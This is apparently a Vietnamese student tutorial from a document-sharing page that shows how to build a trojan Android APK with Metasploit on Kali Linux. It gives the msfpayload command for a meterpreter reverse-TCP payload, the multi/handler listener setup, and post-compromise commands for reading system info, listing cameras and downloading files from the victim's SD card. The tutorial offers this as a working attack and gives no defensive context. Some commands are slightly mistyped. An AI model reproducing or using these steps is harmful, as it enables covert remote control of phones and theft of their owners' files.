tạo mã độc trên kali linux để thâm nhập android
Post on 13-Jun-2015
622 Views
Preview:
DESCRIPTION
TRANSCRIPT
Lê Trân Xuân Lanh- Lơp CNTT – Sang 2,4,6
Tạo mã độc trên KALI LINUX để thâm nhập android
Ta sử dụng Metasploit framework trên Kali Linux để tạo một payload, khi máy android tải về và mở payload lên thì sẽ bị xâm nhập và điều khiển. Nếu sử dụng máy ảo Kali Linux bằng Vmware, ta nên thiết lập phần Network như sau:
chọn vào Network Adapter và chọn Bridged: connection directly to the physical network
phần Bridge (connect VMs directly to the external network) chọn adapter của máy thật
Đầu tiên mở terminal và gõ dòng lệnh
ifconfig để xem thông số về IP của máy
sau đó gõ lệnh
Msfpayload android/meterpreter/reverse_tcp lhost=192.168.0.104 lport=8080 R > /root/Desktop/files.apk
lệnh trên sẽ tạo ra 1 file binh.apk và sẽ được lưu ở đường dẫn root/Desktop/
LHOST -ta ghi vào địa chỉ IP của máy, LPORT-8080 là số port, có thể chọn port khác, không nên chọn các port thường sử dụng (well knowm port : 0 -> 1023).
tiếp theo gõ lệnh msfconsole:
Sau khi msfconsile load xong, ta tạo một handler để xử lí dữ liệu truyền về bằng cách gõ lệnh sau:
use exploit/multi/handler
set payload /meterpreter/reverse_tcp
set lhost 192.168.0.104 – nhập địa chỉ IP giống với khi tạo payload ở trên.
set port 8080 – nhập port giống với port khi tạo payload ở trên.
Exploit
Sau đó chúng ta đợi cho android cài đặt ứng dụng binh.apk vào máy ảo và đợi khi thiết bị android đã kích hoạt
khi xuất hiện thêm dòng lệnh này thì đã thành công
giao diện ứng dụng của android:
để xem thông tin về máy gõ :sysinfo
để xem thông tin về camera gõ: webcam_list
để truy cập vào thẻ nhớ của điện thoại gõ : cd /sdcard sau đó ls máy sẽ hiển thị các folder có trong điện thoại
vd :khi bạn muốn vào tập tin Alarms để download những gì bên trong thì bạn gõ
-cd /sdcard/Alarms
-ls(nó sẽ hiển thị tất cả các thư mục bên trong)
-download tenfile
sau đó sẽ tự động download về máy tính
top related